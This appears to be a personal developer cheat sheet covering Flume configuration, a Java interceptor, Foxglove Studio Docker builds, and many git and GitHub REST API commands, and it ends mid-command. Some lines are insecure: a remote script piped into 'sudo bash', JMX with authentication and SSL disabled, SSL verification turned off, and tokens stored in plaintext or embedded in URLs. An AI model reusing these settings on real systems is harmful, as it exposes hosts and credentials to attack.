agent_2.sources.pythonScriptExample.batchTimeout = 1
agent_2.sources.pythonScriptExample.command = python /home/technik/temp/flume-example/seq-gen.py
agent_2.sources.pythonScriptExample.channels = memoryChannel
#          ^   ^
#         |     |
#        |       |
#       | channel |
#        |       |
#         |     |
#          V   V
agent_2.sinks.loggerSink.channel = memoryChannel
agent_2.sinks.loggerSink.type = logger
agent_2.sinks.loggerSink.batch-size=500

# description of channel between Source and Sink
agent_2.channels.memoryChannel.type = memory
agent_2.channels.memoryChannel.capacity = 100

interceptor example

# interceptors are configured on the source; the compiled jar should be placed into ./lib
agent_2.sources.pythonScriptExample.interceptors = myCustomInterceptor
# full path to the Builder class
agent_2.sources.pythonScriptExample.interceptors.myCustomInterceptor.type = MyInterceptor$Builder
import java.util.List;

import org.apache.flume.Context;
import org.apache.flume.Event;
import org.apache.flume.interceptor.Interceptor;

public class MyInterceptor implements Interceptor {

    @Override
    public void close()
    {

    }

    @Override
    public void initialize()
    {

    }

    @Override
    public Event intercept(Event event)
    {
        byte[] eventBody = event.getBody();
        System.out.println("next event >>> "+eventBody);
        // event.setBody(modifiedEvent);
        return event;
    }

    @Override
    public List<Event> intercept(List<Event> events)
    {
        for (Event event : events){

            intercept(event);
        }

        return events;
    }

    public static class Builder implements Interceptor.Builder
    {
        @Override
        public void configure(Context context) {
        }

        @Override
        public Interceptor build() {
            return new MyInterceptor();
        }
    }
}

change JVM properties, remove debug example

change the JAVA_OPTS variable in the file bin/flume-ng ( around line 225 )

JAVA_OPTS="-Dcom.sun.management.jmxremote
-Dcom.sun.management.jmxremote.port=4159
-Dcom.sun.management.jmxremote.authenticate=false
-Dcom.sun.management.jmxremote.ssl=false"
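
with these options set, a JMX client can attach to the agent

jconsole localhost:4159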

Foxglove Studio cheat sheet

clone repo

git clone --depth 1 https://github.com/foxglove/studio
# Syntax Error: Unexpected identifier
# (function (exports, require, module, __filename, __dirname) { version https://git-lfs.github.com/spec/v1
cd studio
git lfs pull

local run

NODE_VERSION=16.15.0
docker run --volume $PWD:/app -it node:$NODE_VERSION /bin/bash
cd /app
# node --version
corepack enable
yarn install --immutable
yarn run web:build:prod

docker

local build

build container locally

FOXGLOVE_IMAGE_NAME=foxglove-local
docker build -t $FOXGLOVE_IMAGE_NAME .
docker save --output $FOXGLOVE_IMAGE_NAME.tar $FOXGLOVE_IMAGE_NAME:latest
# docker save --output $FOXGLOVE_IMAGE_NAME-cors.tar $FOXGLOVE_IMAGE_NAME:cors
docker load -i {filename of archive}

build container locally and use CORS for the application

FOXGLOVE_IMAGE_NAME=foxglove-local
FOXGLOVE_CADDY_CONF=caddy-cors.conf
echo ':8080
root * /src
file_server browse

# https://caddyserver.com/docs/caddyfile/directives/header
header Access-Control-Allow-Origin "*"

header { 
  Access-Control-Allow-Origin "*"
  Access-Control-Allow-Methods "GET, POST, PUT"
  Access-Control-Allow-Headers "Content-Type"
}' > $FOXGLOVE_CADDY_CONF

# check execution
# docker run  --entrypoint="" --publish 9090:8080 -v `pwd`:/localdata -v `pwd`/caddy-cors.conf:/etc/caddy/Caddyfile $FOXGLOVE_IMAGE_NAME caddy run --config /etc/caddy/Caddyfile --adapter caddyfile

FOXGLOVE_DOCKER_CORS=Dockerfile-cors
echo "FROM foxglove-local
COPY $FOXGLOVE_CADDY_CONF /etc/caddy/Caddyfile
WORKDIR /src
EXPOSE 8080
CMD [\"caddy\",\"run\",\"--config\",\"/etc/caddy/Caddyfile\",\"--adapter\",\"caddyfile\"]" > $FOXGLOVE_DOCKER_CORS

docker build -t $FOXGLOVE_IMAGE_NAME:cors -f $FOXGLOVE_DOCKER_CORS .

docker run --publish 9090:8080 $FOXGLOVE_IMAGE_NAME:cors

GEO

location and spatial position

formal language for describing geoinformation & spatial data

git cheat sheet

public services

cheat sheet collection

branching strategies:

  • Release branching

    release manager create branch "release" at the end merge it back...

  • Feature branching

    goes with "feature-toggle" ( to decrease risk after merging ) - per feature

  • Task branching ( git flow )
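
    a typical task/feature branch round trip ( branch names are illustrative ):

    git checkout -b feature/JIRA-123-my-task origin/develop
    # ... commit work ...
    git push -u origin feature/JIRA-123-my-task
    # merge back keeping the feature history visible
    git checkout develop
    git merge --no-ff feature/JIRA-123-my-task
    git push origin develop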

useful links collection

git autocomplete

# curl https://raw.githubusercontent.com/git/git/master/contrib/completion/git-completion.bash -o ~/.git-completion.bash
# .bashrc
if [ -f ~/.git-completion.bash ]; then
  export GIT_COMPLETION_CHECKOUT_NO_GUESS=0
  export GIT_COMPLETION_SHOW_ALL_COMMANDS=1
  export GIT_COMPLETION_SHOW_ALL=1
  source ~/.git-completion.bash
fi

debug flag, verbose output of commands, output debug

export GIT_TRACE=1
export GIT_CURL_VERBOSE=1

clean working tree remove untracked files

git clean --dry-run
git clean -f -d
# remove all remote non-used branches
git remote prune origin

restore

git reset --hard

restore local branch like remote one

git reset --hard origin/master

restore local branch with saving all the work

# save work to staging
git reset --soft origin/master
# save work to working dir
git reset --mixed HEAD~2

restore removed file, restore deleted file, find removed file, show removed file

# find full path to the file 
file_name="integration_test.sh.j2"
git log --diff-filter=D --name-only | grep $file_name

# find last log messages 
full_path="ansible/roles/data-ingestion/templates/integration_test.sh.j2"
git log -2 --name-only -- $full_path

second_log_commit="99994ccef3dbb86c713a44815ab5ffa"

# restore file from specific commit
git checkout $second_log_commit -- $full_path
# show removed file 
git show $second_log_commit:$full_path

remove last commit and put HEAD to previous one

git reset --hard HEAD~1

checkout with tracking

git checkout -t origin/develop

new branch from stash

git stash branch $BRANCH_NAME stash@{3}

show removed remotely

git remote prune origin

delete local branch, remove branch, remove local branch

git branch -d release-6.9.0
git branch --delete release-6.9.0

# delete with force - for non-merged branches
git branch -D origin/release/2018.05.00.12-test
# the same as
git branch -d -f release-6.9.0
git branch --delete --force origin/release/2018.05.00.12-test

# branch my-branch-name not found
git push origin --delete my-branch-name

delete remote branch, remove remote, remove remote branch

git push origin --delete release/2018.05.00.12-test

remove branches, delete branches that exist locally only ( not remotely ), cleanup local repo

git gc --prune=now
git fetch --prune

delete local branches that were merged into master ( and do not have an 'in-progress' marker )

git branch --merged | egrep -v "(^\*|master|in-progress)" | xargs git branch -d

remove commit, remove wrong commit

commit1=10141d299ac14cdadaca4dd586195309020
commit2=b6f2f57a82810948eeb4b7e7676e031a634 # should be removed and not important
commit3=be82bf6ad93c8154b68fe2199bc3e52dd69

current_branch=my_branch
current_branch_ghost=my_branch_2

git checkout $commit1
git checkout -b $current_branch_ghost
git cherry-pick $commit3
git push --force origin HEAD:$current_branch
git reset --hard origin/$current_branch
git branch -d $current_branch_ghost

squash commit, replace batch of commits, shrink commits

interactive rebase

git checkout my_branch
# take a look at your local changes; for instance, we are going to squash 4 commits
git reset --soft HEAD~4
# in case of having external changes and compress commits: git rebase --interactive HEAD~4

git commit # your files should be staged before
git push --force-with-lease origin my_branch

check hash-code of the branch, show commit hash code

git rev-parse "remotes/origin/release-6.0.0"

print current hashcode commit hash last commit hash, custom log output

git rev-parse HEAD
git log -n 1 --pretty=format:'%h' > /tmp/gitHash.txt
# print author of the last commit
git log -1 remotes/origin/patch-1 --pretty=format:'%an'

print branch name by hashcode to branch name show named branches branchname find branch by hash

git ls-remote | grep <hashcode>
# answer will be like:          <hashcode>        <branch name>
# ada7648394793cfd781038f88993a5d533d4cdfdf        refs/heads/release-dataapi-13.0.2

or

git branch --all --contains ada764839

print branch hash code by name branch hash branch head hash

git rev-parse remotes/origin/release-data-api-13.3

check all branches for certain commit ( is commit in branch, is branch contains commit ), commit include in

git branch --all --contains 0ff27c79738a6ed718baae3e18c74ba87f16a314
git branch --all --merged 0ff27c79738a6ed718baae3e18c74ba87f16a314
# if branch in another branch
git branch --all --contains | grep {name-of-the-branch}

is commit included in another, commit before, commit after, if commit in branch

HASH='222333111'
BRANCH_NAME='release/7.4'
git merge-base --is-ancestor $HASH $BRANCH_NAME; if [[ 1 -eq "$?" ]]; then echo "NOT included"; else echo "included"; fi

check log by hash, message by hash

git log -1 0ff27c79738a6ed718baae3e18c74ba87f16a314

check last commits for specific branch, last commits in branch

git log -5 develop

check last commits for subfolder, check last commits for author, last commit in folder

git log -10 --author "Frank Newman" -- my-sub-folder-in-repo

get last versions of the file, get file history as snapshots

FILE_PATH=./1.md
git log -n 20 --pretty=format:"%h" -- $FILE_PATH | xargs -I{} git show {} -- $FILE_PATH > out.txt

log pretty print log oneline

git log --oneline -5

check files only for last commits

git log -5 develop --name-only

check last commits by author, commits from all branches

git log -10 --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)<%an>%Creset%n' --all --author "Cherkashyn"

list of authors, list of users, list of all users

git shortlog -sne --all

list of files by author, list changed files

git whatchanged --author="Cherkashyn" --name-only 

often changes by author, log files log with files

git log --author="Cherkashyn" --name-status --diff-filter=M | grep "^M" | sort | uniq -c | sort -rh

commit show files, files by commit

git diff-tree --no-commit-id --name-only -r ec3772

commit diff, show changes by commit, commit changes

git diff ec3772~ ec3772
git diff ec3772~..ec3772

apply diff apply patch

git diff ec3772~..ec3772 > patch.diff
git apply patch.diff

pretty log with tree

git log --all --graph --decorate --oneline --simplify-by-decoration

git log message search commit message search commit search message

git log | grep -i jwt

git log --all --grep='jwt'
git log --name-only  --grep='XVIZ instance'
git log -g --grep='jwt'

show no merged branches

git branch --no-merged

show branches with commits

git show-branch
git show-branch -r

checkout branch locally and track it

git checkout -t remotes/origin/release

show file from another branch, show file by branch

BRANCH_NAME=feature_1234
FILE_NAME=src/main/java/EnterPoint.java
git show $BRANCH_NAME:$FILE_NAME

copy file from another branch

git checkout experiment -- deployment/connection_pool.py                                 
git checkout origin/develop datastorage/mysql/scripts/_write_ddl.sh
# print to stdout
git show origin/develop:datastorage/mysql/scripts/_write_ddl.sh > _write_ddl.sh

git add

git add --patch
git add --interactive

git mark file unchanged skip file

git update-index --assume-unchanged path/to/file

set username, global settings

git config --global user.name "vitalii cherkashyn"
git config --global user.email [email protected]
git config --global --list

or

# git config --global --edit
[user]
   name=Vitalii Cherkashyn
   email=[email protected]

default editor, set editor

git config --global core.editor "vim"

avoid to enter login/password

git config --global credential.helper store

after first typing login/password it will be stored in

vim ~/.git-credentials

revert all previous changes with "credential.helper"

git config --system --unset credential.helper
git config --global --unset credential.helper

git config mergetool

git config --global merge.tool meld
git config --global mergetool.meld.path /usr/bin/meld

git config for aws code commit

[credential]
	helper = "!aws --profile 'my_aws_profile' codecommit credential-helper $@"
	UseHttpPath = true

show all branches merged into specified

git branch --all --merged "release" --verbose
git branch --all --no-merged "release" --verbose
git branch -vv

difference between two commits ( diff between branches )

git diff --name-status develop release-6.0.0
git cherry develop release-6.0.0

difference between branches for file ( diff between branches, compare branches )

git diff develop..master -- myfile.cs

github difference between two branches https://github.com/cherkavi/management/compare/release-4.0.6...release-4.0.7

difference between branch and current file ( compare file with file in branch )

git diff master -- myfile.cs

difference between committed and staged

git diff --staged

difference between two branches, list of commits list commits, messages list of messages between two commits

git rev-list master..search-client-solr
# by author
git rev-list --author="Vitalii Cherkashyn" item-598233..item-530201
# list of files that were changed
git show --name-only --oneline `git rev-list --author="Vitalii Cherkashyn" item-598233..item-530201`
#  list of commits between two branches 
git show --name-only --oneline `git rev-list d3ef784e62fdac97528a9f458b2e583ceee0ba3d..eec5683ed0fa5c16e930cd7579e32fc0af268191`

list of commits between two tags

# git tag --list
start_tag='1.0.13'
end_tag='1.1.2'
start_commit=$(git show-ref --hash $start_tag )
end_commit=$(git show-ref --hash $end_tag )
git show --name-only --oneline `git rev-list $start_commit..$end_commit`

all commits from tag till now

start_tag='1.1.2'
start_commit=$(git show-ref --hash $start_tag )
end_commit=$(git log -n 1 --pretty=format:'%H')
git show --name-only --oneline `git rev-list $start_commit..$end_commit`

difference for log changes, diff log, log diff

git log -1 --patch 
git log -1 --patch -- path/to/controller_email.py

copying from another branch, copy file branch

branch_source="master"
branch_dest="feature-2121"
file_name="src/libs/service/message_encoding.py"

# check
git diff $branch_dest..$branch_source $file_name
# apply 
git checkout $branch_source -- $file_name
# check 
git diff $branch_source $file_name

tags

create tag

git tag -a $newVersion -m 'deployment_jenkins_job' 

push tags only

git push --tags $remoteUrl

show tags

# show current tags show tags for current commit
git show
git describe --tags
git describe


# fetch tags
git fetch --all --tags --prune

# list of all tags list tag list
git tag
git tag --list
git show-ref --tags

# tag checkout tag
git checkout tags/1.0.13

show tag hash

git show-ref -s 1.1.2

remove tag delete tag delete

# remove remote
git push --delete origin 1.1.0
git push origin :refs/tags/1.1.0
git fetch --all --tags --prune

# or remove remote
git push --delete origin 1.2.1

# remove local 
git tag -d 1.1.0
git push origin :refs/tags/1.1.0

conflict files, show conflicts

git diff --name-only --diff-filter=U

conflict file apply remote changes

git checkout --theirs path/to/file

git fetch

git fetch --all --prune

find by comment

git log --all --grep "BCM-642"

find by diff source, find through all text changes in repo, full text search with grep

git grep '^test$'
# test against all branches
git grep -e '^test$' $(git rev-list --all)

current commit

git rev-parse HEAD

find file into log

git log --all -- "**db-update.py"
git log --all -- db-scripts/src/main/python/db-diff/db-update.py

history of file, file changes file authors file log file history file versions

git log path/to/file
git log -p -- path/to/file

files in commit

git diff-tree --no-commit-id --name-only -r 6dee1f44f56cdaa673bbfc3a76213dec48ecc983

difference between current state and remote branch

git fetch --all
git diff HEAD..origin/develop

show changes into file only

git show 143243a3754c51b16c24a2edcac4bcb32cf0a37d -- db-scripts/src/main/python/db-diff/db-update.py

show changes by commit, commit changes

git diff {hash}~ {hash}

git cherry pick without commit, just copy changes from another branch

git cherry-pick -n {commit-hash}

git cherry pick with original commit message cherry pick tracking cherry pick original hash

git cherry-pick -x <commit hash>

git cherry pick, git cherry-pick conflict

# in case of merge conflict during cherry-pick
git cherry-pick --continue
git cherry-pick --abort
git cherry-pick --skip
# !!! don't use "git commit" 

git new branch from detached head

git checkout <hash code>
git cherry-pick <hash code2>
git switch -c <new branch name>

git revert commit

git revert <commit>

git revert message for commit

git commit --amend -m "<new message>"

git show author of the commit, log commit, show commits only

git log --pretty=format:"%h - %an, %ar : %s" <commit SHA> -1

show author, blame, annotation, line editor, show editor

git blame path/to/file
git blame path/to/file | grep search_line
git blame -CM -L 1,5 path/to/file/parameters.py

git into different repository, different folder, another folder, not current directory, another home

git --git-dir=C:\project\horus\.git  --work-tree=C:\project\horus  branch --all
find . -name ".git" -maxdepth 2 | while read each_file
do
   echo $each_file
   git --git-dir=$each_file --work-tree=`dirname $each_file` status
done

show remote url

git remote -v
git ls-remote 
git ls-remote --heads

connect to existing repo

PATH_TO_FOLDER=/home/projects/bash-example

# remote set
git remote add local-hdd file://${PATH_TO_FOLDER}/.git
# commit all files 
git add *; git commit --message 'add all files to git'

# set tracking branch
git branch --set-upstream-to=local-hdd/master master

# avoid to have "refusing to merge unrelated histories"
git fetch --all
git merge master --allow-unrelated-histories
# merge all conflicts
# in original folder move to another branch for avoiding: branch is currently checked out
git push local-hdd HEAD:master

# go to origin folder
cd $PATH_TO_FOLDER
git reset --soft origin/master 
git diff 

using authentication token personal access token, git remote set, git set remote

example of using github.com

# Settings -> Developer settings -> Personal access tokens
# https://github.com/settings/apps
git remote set-url origin https://$GIT_TOKEN@github.com/cherkavi/python-utilitites.git

# in case of Error: no such remote 
git remote add origin https://$GIT_TOKEN@github.com/cherkavi/python-utilitites.git
# in case of asking username & password - check URL, https prefix, name of the repo.... 
# in case of existing origin, when you add next remote - change name origin to something else like 'origin-gitlab'/'origin-github'

git remote add bitbucket https://[email protected]/cherkavi/python-utilitites.git
git pull bitbucket master --allow-unrelated-histories
function git-token-update(){
    remote_url=`git config --get remote.origin.url`
    github_part=$(echo "$remote_url" | sed 's/.*github.com\///')
    # echo "https://[email protected]/$github_part"
    git remote set-url origin "https://$GIT_TOKEN@github.com/$github_part"
}

remove old password-access approach

git remote set-url --delete origin https://github.com/cherkavi/python-utilitites.git

change remote url

git remote set-url origin [email protected]:adp/management.git

git clone via https

# username - token
# password - empty string
git clone               https://$GIT_TOKEN@cc-github.group.net/swh/management.git
git clone        https://oauth2:$GIT_TOKEN@cc-github.group.net/swh/management.git
git clone https://$GIT_TOKEN:[email protected]/swh/management.git

git push via ssh git ssh

git commit -am 'hello my commit message'
GIT_SSH_COMMAND="ssh -i $key" git push

issue with removing files, issue with restoring files, can't restore file, can't remove file

git rm --cached -r .
git reset --hard origin/master

clone operation under the hood

if during the access ( clone, pull ) issue appear:

fatal: unable to access 'http://localhost:3000/vitalii/sensor-yaml.git/': The requested URL returned error: 407

or

fatal: unable to access 'http://localhost:3000/vitalii/sensor-yaml.git/': The requested URL returned error: 503

use next command to 'simulate' cloning

git clone http://localhost:3000/vitalii/sensor-yaml.git
< equals >
wget http://localhost:3000/vitalii/sensor-yaml.git/info/refs?service=git-upload-pack

clone only files without history, download code copy repo shallow copy

git clone --depth 1 https://github.com/kubernetes/minikube

download single file from repo

git archive --remote=ssh://https://github.com/cherkavi/cheat-sheet HEAD jenkins.md

update remote branches, when you see not existing remote branches

git remote update origin --prune

worktree

a worktree is an additional working copy of the same repository placed in another folder; all worktrees stay connected to the one repository

# list of all existing worktrees
git worktree list

# add new worktree for an existing branch
git worktree add $PATH_TO_WORKTREE $EXISTING_BRANCH

# add new worktree with checkout to new branch
git worktree add -b $BRANCH_NEW $PATH_TO_WORKTREE

# remove existing worktree, remove link from repo
git worktree remove $PATH_TO_WORKTREE
git worktree prune

package update

echo 'deb http://http.debian.net/debian wheezy-backports main' > /etc/apt/sources.list.d/wheezy-backports-main.list
curl -s https://packagecloud.io/install/repositories/github/git-lfs/script.deb.sh | sudo bash

tool installation

sudo apt-get install git-lfs
git lfs install
git lfs pull

if you are using SSH access to git, you should specify http credentials ( lfs is using http access ), to avoid possible errors: "Service Unavailable...", "Smudge error...", "Error downloading object"

git config --global credential.helper store

file .gitconfig will have next section

[credential]
        helper = store

file ~/.git-credentials ( default from previous command ) should contains your http(s) credentials

https://username:[email protected]
https://username:[email protected]

git lfs proxy

be aware about upper case for environment variables

NO_PROXY=localhost,127.0.0.1,.localdomain,.advantage.org
HTTP_PROXY=muc.proxy
HTTPS_PROXY=muc.proxy

git lfs check

git lfs env
git lfs status

issue with git lfs

Encountered 1 file(s) that should have been pointers, but weren't:
git lfs migrate import --no-rewrite path-to-file

git lfs add file

git lfs track "*.psd"
# check tracking 
cat .gitattributes | grep psd

check tracking changes in file:

git add .gitattributes

create local repo in filesystem

# create bare repo file:///home/projects/bmw/temp/repo
# for avoiding: error: failed to push some refs to 
mkdir /home/projects/bmw/temp/repo
cd /home/projects/bmw/temp/repo
git init --bare
# or git config --bool core.bare true

# clone to copy #1
mkdir /home/projects/bmw/temp/repo2
cd /home/projects/bmw/temp/repo2
git clone file:///home/projects/bmw/temp/repo

# clone to copy #2
mkdir /home/projects/bmw/temp/repo3
cd /home/projects/bmw/temp/repo3
git clone file:///home/projects/bmw/temp/repo

configuration for proxy server, proxy configuration

set proxy, using proxy

git config --global http.proxy 139.7.95.74:8080
# proxy settings
git config --global http.proxy http://proxyuser:[email protected]:8080
git config --global https.proxy 139.7.95.74:8080

check proxy, get proxy

git config --global --get http.proxy

remove proxy configuration, unset proxy

git config --global --unset http.proxy

using additional command before 'fetch' 'push', custom fetch/push

# remote: 'receive.denyCurrentBranch' configuration variable to 'refuse'.
git config core.sshCommand 'ssh -i private_key_file'

set configuration

git config --local receive.denyCurrentBranch updateInstead

remove auto replacing CRLF for LF on Windows OS

.gitattributes

*.sh -crlf

http certificate ssl verification

git config --system http.sslcainfo C:\soft\git\usr\ssl\certs\ca-bundle.crt
# or 
git config --system http.sslverify false

download latest release from github, release download

GIT_ACCOUNT=ajaxray
GIT_PROJECT=geek-life
GIT_RELEASE_ARTIFACT=geek-life_linux-amd64
wget https://github.com/${GIT_ACCOUNT}/${GIT_PROJECT}/releases/latest/download/$GIT_RELEASE_ARTIFACT

# curl -s https://api.github.com/repos/bugy/script-server/releases/latest | grep browser_download_url | cut -d '"' -f 4

download latest release with tag

GIT_ACCOUNT=mozilla
GIT_PROJECT=geckodriver
RELEASE_FILE_BEFORE_TAG="geckodriver-"
RELEASE_FILE_AFTER_TAG="-linux64.tar.gz"

release_url=https://github.com/${GIT_ACCOUNT}/${GIT_PROJECT}/releases/latest
latest_release_url=$(curl -s -I -L -o /dev/null -w '%{url_effective}' $release_url)
release_tag=`echo $latest_release_url | awk -F '/' '{print $NF}'`
release_file=$RELEASE_FILE_BEFORE_TAG$release_tag$RELEASE_FILE_AFTER_TAG

release_download="https://github.com/${GIT_ACCOUNT}/${GIT_PROJECT}/releases/download/${release_tag}/$release_file"

# Create a directory for downloads
output_dir="/home/soft/selenium-drivers"
file_name=gekodriver-mozilla
# Create the output directory if it doesn't exist
mkdir -p "$output_dir"
# Download the latest release
curl -L -o $output_dir/${file_name}.tar.gz "$release_download"

tar -xzf $output_dir/${file_name}.tar.gz -C $output_dir
mv $output_dir/geckodriver $output_dir/$file_name
chmod +x $output_dir/$file_name
$output_dir/$file_name --version

download latest version of file from github, url to source, source download

GIT_ACCOUNT=cherkavi
GIT_PROJECT=cheat-sheet
GIT_BRANCH=master
GIT_PATH=git.md
wget https://raw.githubusercontent.com/$GIT_ACCOUNT/$GIT_PROJECT/$GIT_BRANCH/$GIT_PATH

linux command line changes

# git settings: show current git branch in the bash prompt
parse_git_branch() {
     git branch 2> /dev/null | sed -e '/^[^*]/d' -e 's/* \(.*\)/ (\1)/'
}
export PS1="\[\033[32m\]\W\[\033[33m\]\$(parse_git_branch)\[\033[00m\] $ " 

ignore tracked file, ignore changes

git update-index --assume-unchanged .idea/vcs.xml

hooks

check commit message

mv .git/hooks/commit-msg.sample .git/hooks/commit-msg
result=`cat $1 | grep "^check-commit"`

if [ "$result" != "" ]; then
	exit 0
else 
	echo "message should start from 'check-commit'"
	exit 1
fi

if you want to commit hooks, then create separate folder and put all files there

git --git-dir $DIR_PROJECT/integration-prototype/.git config core.hooksPath $DIR_PROJECT/integration-prototype/.git_hooks
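
a minimal sketch of preparing such a folder ( reusing the commit-msg check from above; the folder name .git_hooks matches the config command above ):

cd $DIR_PROJECT/integration-prototype
mkdir -p .git_hooks
# any executable file named like a standard hook is picked up from core.hooksPath
cp .git/hooks/commit-msg .git_hooks/commit-msg
chmod +x .git_hooks/commit-msg
git config core.hooksPath .git_hooks
git add .git_hooks    # now the hooks can be committed with the repository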

git template message template

git --git-dir $DIR_PROJECT/integration-prototype/.git config commit.template $DIR_PROJECT/integration-prototype/.commit.template
pip install gitlint
gitlint install-hook

.gitlint

# See http://jorisroovers.github.io/gitlint/rules/ for a full description.
[general]
ignore=T3,T5,B1,B5,B7
[title-match-regex]
regex=^[A-Z].{0,71}[^?!.,:; ]

advices

migration from another git repo

image

big monorepo: increase git responsiveness

git config core.fsmonitor true
git config core.untrackedcache true

time git status

fix commit to wrong branch

fix wrong branch commit

rest api collaboration

GITHUB_USER=cherkavi
GITHUB_PROJECT=python-utilities
GITHUB_TOKEN=$GIT_TOKEN

curl https://api.github.com/users/$GITHUB_USER
curl https://api.github.com/users/$GITHUB_USER/repos
curl https://api.github.com/repos/$GITHUB_USER/$GITHUB_PROJECT

git ENTERPRISE rest api ( maybe you are looking for the github rest api section below )

export PAT=07f1798524d6f79...
export GIT_USER=tech_user
export GIT_REPO_OWNER=another_user
export GIT_REPO=system_description
export GIT_URL=https://github.sbbgroup.zur

git rest api
git endpoints

# read user's data 
curl -H "Authorization: token ${PAT}" ${GIT_URL}/api/v3/users/${GIT_USER}
curl -u ${GIT_USER}:${PAT} ${GIT_URL}/api/v3/users/${GIT_REPO_OWNER}

# list of repositories 
curl -u ${GIT_USER}:${PAT} ${GIT_URL}/api/v3/users/${GIT_REPO_OWNER}/repos | grep html_url

# read repository
curl -u ${GIT_USER}:${PAT} ${GIT_URL}/api/v3/repos/${GIT_REPO_OWNER}/${GIT_REPO}
curl -H "Authorization: token ${PAT}" ${GIT_URL}/api/v3/repos/${GIT_REPO_OWNER}/${GIT_REPO}

# read path
export FILE_PATH=doc/README
curl -u ${GIT_USER}:${PAT} ${GIT_URL}/api/v3/repos/${GIT_REPO_OWNER}/${GIT_REPO}/contents/${FILE_PATH}
curl -u ${GIT_USER}:${PAT} ${GIT_URL}/api/v3/repos/${GIT_REPO_OWNER}/${GIT_REPO}/contents/${FILE_PATH} | jq .download_url

# https://docs.github.com/en/[email protected]/rest/reference/repos#contents
# read path to file 
DOWNLOAD_URL=`curl -u ${GIT_USER}:${PAT} ${GIT_URL}/api/v3/repos/${GIT_REPO_OWNER}/${GIT_REPO}/contents/${FILE_PATH} | jq .download_url | tr '"' ' '`
echo $DOWNLOAD_URL 
curl -u ${GIT_USER}:${PAT} -X GET $DOWNLOAD_URL

# read content
curl -u ${GIT_USER}:${PAT} ${GIT_URL}/api/v3/repos/${GIT_REPO_OWNER}/${GIT_REPO}/contents/${FILE_PATH} | jq -r ".content" | base64 --decode
# GIT_URL=https://github.ubsbank.ch
# GIT_API_URL=$GIT_URL/api/v3

GIT_API_URL=https://api.github.com

# get access to repo 
# Paging: !!! Check if there is a 'Link' header with a 'rel="next"' link
function git-api-get(){
    curl -s --request GET  --header "Authorization: Bearer $GIT_TOKEN_REST_API" --url "${GIT_API_URL}${1}"
}
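
# pagination sketch ( assumption: the endpoint returns a JSON array and supports the standard 'page' / 'per_page' query parameters );
# loop until an empty page comes back instead of parsing the 'Link' header
function git-api-get-all(){
    local endpoint=$1
    local page=1
    while true; do
        local chunk=$(git-api-get "${endpoint}?per_page=100&page=${page}")
        if [ "$(echo "$chunk" | jq 'length')" -eq 0 ]; then break; fi
        echo "$chunk" | jq -c '.[]'
        page=$((page+1))
    done
}
# usage: git-api-get-all /users/${GIT_USER}/repos | jq -r .clone_url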


# list of all accessing endpoints
git-api-get 

# user info
GIT_USER_NAME=$(git-api-get /user | jq -r .login)   # use .login ( not .name ): the repos endpoint expects the account login
echo $GIT_USER_NAME

# repositories
git-api-get /users/$GIT_USER_NAME/repos

# git rest with page size  
git-api-get /users/${GIT_USER}/repos?per_page=100 | jq ".[] | [.fork, .clone_url]"


GIT_REPO_OWNER=swh
GIT_REPO_NAME=data-warehouse
git-api-get /repos/$GIT_REPO_OWNER/$GIT_REPO_NAME

# pull requests
git-api-get /repos/$GIT_REPO_OWNER/$GIT_REPO_NAME/pulls

PULL_REQUEST_NUMBER=20203
# pull request info
git-api-get /repos/$GIT_REPO_OWNER/$GIT_REPO_NAME/pulls/$PULL_REQUEST_NUMBER
# | jq -c '[.[] | {ref:.head.ref, body:.body, user:.user.login, created:.created_at, updated:.updated_at, state:.state, draft:.draft, reviewers_type:[.requested_reviewers[].type], reviewers_login:[.requested_reviewers[].login], request_team:[.requested_teams[].name], labels:[.labels[].name]}]'

# pull request files
git-api-get /repos/$GIT_REPO_OWNER/$GIT_REPO_NAME/pulls/$PULL_REQUEST_NUMBER/files | jq .[].filename
# search for pull request 
ISSUE_ID=MAGNUM-1477
# use + sign instead of space
SEARCH_STR="is:pr+${ISSUE_ID}"
curl -s --request GET  --header "Authorization: Bearer $GIT_TOKEN_REST_API" --url "${GIT_API_URL}/search/issues?q=${SEARCH_STR}&sort=created&order=asc" 

# print all files by pull request
ISSUE_ID=$1
SEARCH_STR="is:pr+${ISSUE_ID}"
PULL_REQUESTS=(`curl -s --request GET  --header "Authorization: Bearer $GIT_TOKEN_REST_API" --url "${GIT_API_URL}/search/issues?q=${SEARCH_STR}&sort=created&order=asc"  | jq .items[].number`)

# Iterate over all elements in the array
for PULL_REQUEST_NUMBER in "${PULL_REQUESTS[@]}"; do
    echo "------$GIT_URL/$GIT_REPO_OWNER/$GIT_REPO_NAME/pull/$PULL_REQUEST_NUMBER------"
    curl -s --request GET  --header "Authorization: Bearer $GIT_TOKEN_REST_API" --url ${GIT_API_URL}/repos/$GIT_REPO_OWNER/$GIT_REPO_NAME/pulls/$PULL_REQUEST_NUMBER/files | jq .[].filename
    echo "--------------------"
done

github credentials

start page

  • _octo

login page

  • _octo
  • logged_in
  • preferred_color_mode
  • tz
  • _gh_sess

after login

  • _octo
  • color_mode
  • dotcom_user
  • logged_in
  • preferred_color_mode
  • tz
  • __Host-user_session_same_site
  • _device_id
  • _gh_sess
  • has_recent_activity
  • saved_user_sessions
  • tz
  • user_session

github rest api

github rest api

create REST API token

## create token with UI 
x-www-browser https://github.com/settings/personal-access-tokens/new

## list of all tokens
x-www-browser https://github.com/settings/tokens
export GITHUB_TOKEN=$GIT_TOKEN

github user

GITHUB_USER=cherkavi
curl https://api.github.com/users/$GITHUB_USER

git workflow secrets via REST API

  • list of the secrets
curl -H "Authorization: Bearer $GIT_TOKEN" https://api.github.com/repos/$GITHUB_USER/$GITHUB_PROJECT/actions/secrets
curl -H "Authorization: token $GIT_TOKEN" https://api.github.com/repos/$GITHUB_USER/$GITHUB_PROJECT/actions/secrets
export GITHUB_TOKEN=$GIT_TOKEN_UDACITY
export GITHUB_PROJECT_ID=`curl https://api.github.com/repos/$GITHUB_USER/$GITHUB_PROJECT | jq .id`
export OWNER=cherkavi
export REPO=udacity-github-cicd
# OWNER and REPO must be set before requesting the repository public key
export GITHUB_PUBLIC_KEY_ID=`curl -X GET -H "Authorization: Bearer $GITHUB_TOKEN" "https://api.github.com/repos/$OWNER/$REPO/actions/secrets/public-key" | jq -r .key_id`

export SECRET_NAME=my_secret_name
export BASE64_ENCODED_SECRET=`echo -n "my secret value" | base64`
# NOTE: the API expects encrypted_value to be the secret encrypted with the repository public key ( libsodium sealed box ) and then base64-encoded; plain base64 of the raw value will be rejected
curl -X PUT -H "Authorization: Bearer $GITHUB_TOKEN" -H "Accept: application/vnd.github.v3+json" \
